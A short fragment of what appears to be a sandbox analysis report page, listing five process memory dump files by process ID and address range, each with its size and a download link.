memory/3584-91-0x0000000005700000-0x0000000005A54000-memory.dmp

Filesize
3.3MB

Download
memory/4048-108-0x00000000012C0000-0x0000000001303000-memory.dmp

Filesize
268KB

Download
memory/4048-109-0x00000000012C0000-0x0000000001303000-memory.dmp

Filesize
268KB

Download
memory/4368-104-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/4876-110-0x00000000058B0000-0x0000000005992000-memory.dmp

Filesize
904KB

Download